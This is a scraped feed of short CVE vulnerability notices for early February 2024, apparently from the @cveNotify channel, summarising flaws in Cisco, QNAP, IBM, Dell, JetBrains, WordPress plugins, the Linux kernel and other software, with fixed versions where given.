🚨 CVE-2023-20246Multiple Cisco products are affected by a vulnerability in Snort access control policies that could allow an unauthenticated, remote attacker to bypass the configured policies on an affected system. This vulnerability is due to a logic error that occurs when the access control policies are being populated. An attacker could exploit this vulnerability by establishing a connection to an affected device. A successful exploit could allow the attacker to bypass configured access control rules on the affected system.🎖@cveNotify |
|
| 2024-02-06 21:07:32 |
🚨 CVE-2024-1196A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-06 21:07:25 |
🚨 CVE-2023-52175Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Uno (miunosoft) Auto Amazon Links – Amazon Associates Affiliate Plugin allows Stored XSS.This issue affects Auto Amazon Links – Amazon Associates Affiliate Plugin: from n/a through 5.1.1.🎖@cveNotify |
|
| 2024-02-06 21:07:24 |
🚨 CVE-2024-23745In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context.🎖@cveNotify |
|
| 2024-02-06 20:37:32 |
🚨 CVE-2023-41279A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.2.2533 build 20230926 and laterQuTS hero h5.1.2.2534 build 20230927 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-02-06 20:37:26 |
🚨 CVE-2023-51520Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPdevelop / Oplugins WP Booking Calendar allows Stored XSS.This issue affects WP Booking Calendar: from n/a before 9.7.4.🎖@cveNotify |
|
| 2024-02-06 20:37:25 |
🚨 CVE-2023-6909Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.🎖@cveNotify |
|
| 2024-02-06 20:37:24 |
🚨 CVE-2023-0686A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been classified as critical. This affects the function update_cart of the file /oews/classes/Master.php?f=update_cart of the component HTTP POST Request Handler. The manipulation of the argument cart_id leads to sql injection. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The identifier VDB-220245 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-06 20:07:32 |
🚨 CVE-2024-22320IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.🎖@cveNotify |
|
| 2024-02-06 20:07:26 |
🚨 CVE-2024-22319IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.🎖@cveNotify |
|
| 2024-02-06 20:07:25 |
🚨 CVE-2024-24567Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. Vyper compiler allows passing a value in builtin raw_call even if the call is a delegatecall or a staticcall. But in the context of delegatecall and staticcall the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the value= argument. If the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. This vulnerability affects 0.3.10 and earlier versions.🎖@cveNotify |
|
| 2024-02-06 20:07:24 |
🚨 CVE-2023-6915A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.🎖@cveNotify |
|
| 2024-02-06 19:37:32 |
🚨 CVE-2023-41276A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.2.2533 build 20230926 and laterQuTS hero h5.1.2.2534 build 20230927 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-02-06 19:37:27 |
🚨 CVE-2024-24556urql is a GraphQL client that exposes a set of helpers for several frameworks. The `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream. To fix this vulnerability upgrade to version 1.1.1🎖@cveNotify |
|
| 2024-02-06 19:37:26 |
🚨 CVE-2024-20263A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices.🎖@cveNotify |
|
| 2024-02-06 19:07:25 |
🚨 CVE-2024-23829aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Security-sensitive parts of the Python HTTP parser retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input. Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling. The unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities. This vulnerability exists due to an incomplete fix for CVE-2023-47627. Version 3.9.2 fixes this vulnerability.🎖@cveNotify |
|
| 2024-02-06 19:07:24 |
🚨 CVE-2023-6238A buffer overflow vulnerability was found in the NVM Express (NVMe) driver in the Linux kernel. Only privileged user could specify a small meta buffer and let the device perform larger Direct Memory Access (DMA) into the same buffer, overwriting unrelated kernel memory, causing random kernel crashes and memory corruption.🎖@cveNotify |
|
| 2024-02-06 18:37:35 |
🚨 CVE-2024-21388Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-06 18:37:28 |
🚨 CVE-2024-21840Incorrect Default Permissions vulnerability in Hitachi Storage Plug-in for VMware vCenter allows local users to read and write specific files.This issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.0.0 through 04.9.2.🎖@cveNotify |
|
| 2024-02-06 18:37:27 |
🚨 CVE-2019-14865A flaw was found in the grub2-set-bootflag utility of grub2. A local attacker could run this utility under resource pressure (for example by setting RLIMIT), causing grub2 configuration files to be truncated and leaving the system unbootable on subsequent reboots.🎖@cveNotify |
|
| 2024-02-06 18:07:46 |
🚨 CVE-2023-42664A post authentication command injection vulnerability exists when setting up the PPTP global configuration of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-06 18:07:45 |
🚨 CVE-2024-24291An issue in the component /member/index/login of yzmcms v7.0 allows attackers to direct users to malicious sites via a crafted URL.🎖@cveNotify |
|
| 2024-02-06 18:07:44 |
🚨 CVE-2024-24013A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/pay/list🎖@cveNotify |
|
| 2024-02-06 18:07:40 |
🚨 CVE-2024-23344Tuleap is an Open Source Suite to improve management of software developments and collaboration. Some users might get access to restricted information when a process validates the permissions of multiple users (e.g. mail notifications). This issue has been patched in version 15.4.99.140 of Tuleap Community Edition.🎖@cveNotify |
|
| 2024-02-06 18:07:39 |
🚨 CVE-2023-46183IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could allow a system administrator to obtain sensitive partition information. IBM X-Force ID: 269695.🎖@cveNotify |
|
| 2024-02-06 18:07:35 |
🚨 CVE-2024-24594A cross-site scripting (XSS) vulnerability in all versions of the web server component of Allegro AI’s ClearML platform allows a remote attacker to execute a JavaScript payload when a user views the Debug Samples tab in the web UI.🎖@cveNotify |
|
| 2024-02-06 18:07:34 |
🚨 CVE-2024-24592Lack of authentication in all versions of the fileserver component of Allegro AI’s ClearML platform allows a remote attacker to arbitrarily access, create, modify and delete files.🎖@cveNotify |
|
| 2024-02-06 18:07:33 |
🚨 CVE-2024-24591A path traversal vulnerability in version 1.4.0 or newer of Allegro AI’s ClearML platform enables a maliciously uploaded dataset to write local or remote files to an arbitrary location on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-02-06 18:07:29 |
🚨 CVE-2024-0911A flaw was found in Indent. This issue may allow a local user to use a specially-crafted file to trigger a heap-based buffer overflow, which can lead to an application crash.🎖@cveNotify |
|
| 2024-02-06 18:07:28 |
🚨 CVE-2023-50165Pega Platform versions 8.2.1 to Infinity 23.1.0 are affected by an Generated PDF issue that could expose file contents.🎖@cveNotify |
|
| 2024-02-06 17:07:30 |
🚨 CVE-2023-6673Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in National Keep Cyber Security Services CyberMath allows Reflected XSS.This issue affects CyberMath: from v.1.4 before v.1.5.🎖@cveNotify |
|
| 2024-02-06 17:07:29 |
🚨 CVE-2023-6672Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in National Keep Cyber Security Services CyberMath allows Stored XSS.This issue affects CyberMath: from v1.4 before v1.5.🎖@cveNotify |
|
| 2024-02-06 17:07:26 |
🚨 CVE-2023-51534Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brave Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content allows Stored XSS.This issue affects Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content: from n/a through 0.6.2.🎖@cveNotify |
|
| 2024-02-06 17:07:25 |
🚨 CVE-2023-51842An algorithm-downgrade issue was discovered in Ylianst MeshCentral 1.1.16.🎖@cveNotify |
|
| 2024-02-06 17:07:24 |
🚨 CVE-2023-51839DeviceFarmer stf v3.6.6 suffers from Use of a Broken or Risky Cryptographic Algorithm.🎖@cveNotify |
|
| 2024-02-06 16:37:37 |
🚨 CVE-2024-24015A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL via /sys/user/exit🎖@cveNotify |
|
| 2024-02-06 16:37:36 |
🚨 CVE-2024-24013A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/pay/list🎖@cveNotify |
|
| 2024-02-06 16:37:32 |
🚨 CVE-2024-23344Tuleap is an Open Source Suite to improve management of software developments and collaboration. Some users might get access to restricted information when a process validates the permissions of multiple users (e.g. mail notifications). This issue has been patched in version 15.4.99.140 of Tuleap Community Edition.🎖@cveNotify |
|
| 2024-02-06 16:37:31 |
🚨 CVE-2023-46183IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could allow a system administrator to obtain sensitive partition information. IBM X-Force ID: 269695.🎖@cveNotify |
|
| 2024-02-06 16:37:26 |
🚨 CVE-2024-22859Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function.🎖@cveNotify |
|
| 2024-02-06 16:37:25 |
🚨 CVE-2023-49038Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.🎖@cveNotify |
|
| 2024-02-06 16:07:31 |
🚨 CVE-2024-22150Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS.This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n/a through 3.1.🎖@cveNotify |
|
| 2024-02-06 16:07:26 |
🚨 CVE-2024-22295Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RoboSoft Photo Gallery, Images, Slider in Rbs Image Gallery allows Stored XSS.This issue affects Photo Gallery, Images, Slider in Rbs Image Gallery: from n/a through 3.2.17.🎖@cveNotify |
|
| 2024-02-06 16:07:25 |
🚨 CVE-2024-22307Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Reflected XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.5.7.🎖@cveNotify |
|
| 2024-02-06 15:07:25 |
🚨 CVE-2024-22162Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Shortcodes allows Reflected XSS.This issue affects WPZOOM Shortcodes: from n/a through 1.0.1.🎖@cveNotify |
|
| 2024-02-06 15:07:24 |
🚨 CVE-2024-22302Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ignazio Scimone Albo Pretorio On line allows Stored XSS.This issue affects Albo Pretorio On line: from n/a through 4.6.6.🎖@cveNotify |
|
| 2024-02-06 14:07:52 |
🚨 CVE-2024-20812Out-of-bounds Write in padmd_vld_htbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-02-06 14:07:51 |
🚨 CVE-2024-20811Improper caller verification in GameOptimizer prior to SMR Feb-2024 Release 1 allows local attackers to configure GameOptimizer.🎖@cveNotify |
|
| 2024-02-06 14:07:50 |
🚨 CVE-2024-22853D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.🎖@cveNotify |
|
| 2024-02-06 14:07:46 |
🚨 CVE-2024-22773Intelbras Roteador ACtion RF 1200 1.2.2 esposes the Password in Cookie resulting in Login Bypass.🎖@cveNotify |
|
| 2024-02-06 14:07:45 |
🚨 CVE-2023-6234Buffer overflow in CPCA Color LUT Resource Download process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.🎖@cveNotify |
|
| 2024-02-06 14:07:40 |
🚨 CVE-2023-6232Buffer overflow in the Address Book username process in authentication of Mobile Device Function of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.🎖@cveNotify |
|
| 2024-02-06 14:07:39 |
🚨 CVE-2023-6229Buffer overflow in CPCA PDL Resource Download process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.🎖@cveNotify |
|
| 2024-02-06 14:07:35 |
🚨 CVE-2023-47022An issue in NCR Terminal Handler v.1.5.1 allows a remote attacker to execute arbitrary code via a crafted script to the payload parameter.🎖@cveNotify |
|
| 2024-02-06 14:07:34 |
🚨 CVE-2023-46359An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.🎖@cveNotify |
|
| 2024-02-06 12:37:34 |
🚨 CVE-2024-0690An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.🎖@cveNotify |
|
| 2024-02-06 12:37:31 |
🚨 CVE-2023-51508Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Database Cleaner: Clean, Optimize & Repair.This issue affects Database Cleaner: Clean, Optimize & Repair: from n/a through 0.9.8.🎖@cveNotify |
|
| 2024-02-06 12:37:30 |
🚨 CVE-2023-52143Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Naa986 WP Stripe Checkout.This issue affects WP Stripe Checkout: from n/a through 1.2.2.37.🎖@cveNotify |
|
| 2024-02-06 12:37:29 |
🚨 CVE-2023-6238A buffer overflow vulnerability was found in the NVM Express (NVMe) driver in the Linux kernel. Only privileged user could specify a small meta buffer and let the device perform larger Direct Memory Access (DMA) into the same buffer, overwriting unrelated kernel memory, causing random kernel crashes and memory corruption.🎖@cveNotify |
|
| 2024-02-06 11:37:25 |
🚨 CVE-2023-52146Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aaron J 404 Solution.This issue affects 404 Solution: from n/a through 2.33.0.🎖@cveNotify |
|
| 2024-02-06 11:37:24 |
🚨 CVE-2023-6238A buffer overflow vulnerability was found in the NVM Express (NVMe) driver in the Linux kernel. An unprivileged user could specify a small meta buffer and let the device perform larger Direct Memory Access (DMA) into the same buffer, overwriting unrelated kernel memory, causing random kernel crashes and memory corruption.🎖@cveNotify |
|
| 2024-02-06 10:37:37 |
🚨 CVE-2024-24943In JetBrains Toolbox App before 2.2 a DoS attack was possible via a malicious SVG image🎖@cveNotify |
|
| 2024-02-06 10:37:34 |
🚨 CVE-2024-24941In JetBrains IntelliJ IDEA before 2023.3.3 a plugin for JetBrains Space was able to send an authentication token to an inappropriate URL🎖@cveNotify |
|
| 2024-02-06 10:37:33 |
🚨 CVE-2024-24939In JetBrains Rider before 2023.3.3 logging of environment variables containing secret values was possible🎖@cveNotify |
|
| 2024-02-06 10:37:32 |
🚨 CVE-2024-24938In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation🎖@cveNotify |
|
| 2024-02-06 10:37:28 |
🚨 CVE-2024-24936In JetBrains TeamCity before 2023.11.2 access control at the S3 Artifact Storage plugin endpoint was missed🎖@cveNotify |
|
| 2024-02-06 10:37:27 |
🚨 CVE-2022-3647** DISPUTED ** A vulnerability, which was classified as problematic, was found in Redis up to 6.2.7/7.0.5. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The complexity of an attack is rather high. The exploitability is told to be difficult. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 6.2.8 and 7.0.6 is able to address this issue. The patch is identified as 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. NOTE: The vendor claims that this is not a DoS because it applies to the crash logging mechanism which is triggered after a crash has occurred.🎖@cveNotify |
|
| 2024-02-06 09:37:35 |
🚨 CVE-2023-4503An improper initialization vulnerability was found in Galleon. When using Galleon to provision custom EAP or EAP-XP servers, the servers are created unsecured. This issue could allow an attacker to access remote HTTP services available from the server.🎖@cveNotify |
|
| 2024-02-06 08:37:30 |
🚨 CVE-2024-22365linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.🎖@cveNotify |
|
| 2024-02-06 08:37:26 |
🚨 CVE-2023-32479Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in installed directory and taking reverse shell of the system leading to Privilege Escalation.🎖@cveNotify |
|
| 2024-02-06 08:37:25 |
🚨 CVE-2023-32451Dell Display Manager application, version 2.1.1.17, contains a vulnerability that low privilege user can execute malicious code during installation and uninstallation🎖@cveNotify |
|
| 2024-02-06 08:37:24 |
🚨 CVE-2023-28063Dell BIOS contains a Signed to Unsigned Conversion Error vulnerability. A local authenticated malicious user with admin privileges could potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2024-02-06 07:37:32 |
🚨 CVE-2024-22433Dell Data Protection Search 19.2.0 and above contain an exposed password opportunity in plain text when using LdapSettings.get_ldap_info in DP Search. A remote unauthorized unauthenticated attacker could potentially exploit this vulnerability leading to a loss of Confidentiality, Integrity, Protection, and remote takeover of the system. This is a high-severity vulnerability as it allows an attacker to take complete control of DP Search to affect downstream protected devices.🎖@cveNotify |
|
| 2024-02-06 07:37:26 |
🚨 CVE-2023-52239The XML parser in Magic xpi Integration Platform 4.13.4 allows XXE attacks, e.g., via onItemImport.🎖@cveNotify |
|
| 2024-02-06 07:37:25 |
🚨 CVE-2024-1143Central Dogma versions prior to 0.64.1 is vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.🎖@cveNotify |
|
| 2024-02-06 07:37:24 |
🚨 CVE-2023-36260An issue was discovered in the Feed Me plugin 4.6.1 for Craft CMS. It allows remote attackers to cause a denial of service (DoS) via crafted strings to Feed-Me Name and Feed-Me URL fields, due to saving a feed using an Asset element type with no volume selected. NOTE: this is not a report about code provided by the Craft CMS product; it is only a report about the Feed Me plugin. NOTE: a third-party report states that commit b5d6ede51848349bd91bc95fec288b6793f15e28 has "nothing to do with security."🎖@cveNotify |
|
| 2024-02-06 06:37:32 |
🚨 CVE-2023-33060Transient DOS in Core when DDR memory check is called while DDR is not initialized.🎖@cveNotify |
|
| 2024-02-06 06:37:25 |
🚨 CVE-2023-33046Memory corruption in Trusted Execution Environment while deinitializing an object used for license validation.🎖@cveNotify |
|
| 2024-02-06 06:37:24 |
🚨 CVE-2024-1143Central Dogma versions prior to 0.64.1 is vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.🎖@cveNotify |
|
| 2024-02-06 05:37:25 |
🚨 CVE-2024-23849In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.🎖@cveNotify |
|
| 2024-02-06 05:37:24 |
🚨 CVE-2023-6679A null pointer dereference vulnerability was found in dpll_pin_parent_pin_set() in drivers/dpll/dpll_netlink.c in the Digital Phase Locked Loop (DPLL) subsystem in the Linux kernel. This issue could be exploited to trigger a denial of service.🎖@cveNotify |
|
| 2024-02-06 04:37:24 |
🚨 CVE-2024-24808pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.🎖@cveNotify |
|
| 2024-02-06 03:37:32 |
🚨 CVE-2024-20815Improper authentication vulnerability in onCharacteristicReadRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness.🎖@cveNotify |
|
| 2024-02-06 03:37:26 |
🚨 CVE-2024-20814Out-of-bounds Read in padmd_vld_ac_prog_refine of libpadm.so prior to SMR Feb-2024 Release 1 allows attacker access unauthorized information.🎖@cveNotify |
|
| 2024-02-06 03:37:25 |
🚨 CVE-2024-20811Improper caller verification in GameOptimizer prior to SMR Feb-2024 Release 1 allows local attackers to configure GameOptimizer.🎖@cveNotify |
|
| 2024-02-06 03:37:24 |
🚨 CVE-2024-20810Implicit intent hijacking vulnerability in Smart Suggestions prior to SMR Feb-2024 Release 1 allows attackers to get sensitive information.🎖@cveNotify |
|
| 2024-02-06 02:37:32 |
🚨 CVE-2024-23213The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-02-06 02:37:26 |
🚨 CVE-2024-23206An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-02-06 02:37:25 |
🚨 CVE-2023-6679A null pointer dereference vulnerability was found in dpll_pin_parent_pin_set() in drivers/dpll/dpll_netlink.c in the Digital Phase Locked Loop (DPLL) subsystem in the Linux kernel. This issue could be exploited to trigger a denial of service.🎖@cveNotify |
|
| 2024-02-06 02:37:24 |
🚨 CVE-2014-1745Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 35.0.1916.114, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger removal of an SVGFontFaceElement object, related to core/svg/SVGFontFaceElement.cpp.🎖@cveNotify |
|
| 2024-02-06 01:37:32 |
🚨 CVE-2023-47889The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode.🎖@cveNotify |
|
| 2024-02-06 01:37:25 |
🚨 CVE-2023-46359An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.🎖@cveNotify |
|
| 2024-02-06 01:37:24 |
🚨 CVE-2024-22319IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.🎖@cveNotify |
|
| 2024-02-06 01:07:33 |
🚨 CVE-2023-51693Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Icons allows Stored XSS.This issue affects Themify Icons: from n/a through 2.0.1.🎖@cveNotify |
|
| 2024-02-06 01:07:26 |
🚨 CVE-2023-51685Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LJ Apps WP Review Slider allows Stored XSS.This issue affects WP Review Slider: from n/a through 12.7.🎖@cveNotify |
|
| 2024-02-06 01:07:25 |
🚨 CVE-2023-51684Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Digital Downloads Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) allows Stored XSS.This issue affects Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy): from n/a through 3.2.5.🎖@cveNotify |
|
| 2024-02-06 00:37:25 |
🚨 CVE-2024-24398Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.🎖@cveNotify |
|
| 2024-02-06 00:37:24 |
🚨 CVE-2023-47354An issue in the PowerOffWidgetReceiver function of Super Reboot (Root) Recovery v1.0.3 allows attackers to arbitrarily reset or power off the device via a crafted intent🎖@cveNotify |
|
| 2024-02-05 23:37:25 |
🚨 CVE-2024-23049An issue in symphony v.3.6.3 and before allows a remote attacker to execute arbitrary code via the log4j component.🎖@cveNotify |
|
| 2024-02-05 23:37:24 |
🚨 CVE-2024-0964A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request.🎖@cveNotify |
|
| 2024-02-05 22:37:35 |
🚨 CVE-2024-22161Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harmonic Design HD Quiz allows Stored XSS.This issue affects HD Quiz: from n/a through 1.8.11.🎖@cveNotify |
|
| 2024-02-05 22:37:28 |
🚨 CVE-2024-22136Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder.This issue affects Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder: from n/a through 3.1.5.🎖@cveNotify |
|
| 2024-02-05 22:37:27 |
🚨 CVE-2023-6592The FastDup WordPress plugin before 2.2 does not prevent directory listing in sensitive directories containing export files.🎖@cveNotify |
|
| 2024-02-05 22:07:25 |
🚨 CVE-2023-4551Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows OS Command Injection.The AppBuilder's Scheduler functionality that facilitates creation of scheduled tasks is vulnerable to command injection. This allows authenticated users to inject arbitrary operating system commands into the executing process.This issue affects AppBuilder: from 21.2 before 23.2.🎖@cveNotify |
|
| 2024-02-05 22:07:24 |
🚨 CVE-2023-40550An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-02-05 21:37:32 |
🚨 CVE-2023-50782A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.🎖@cveNotify |
|
| 2024-02-05 21:37:25 |
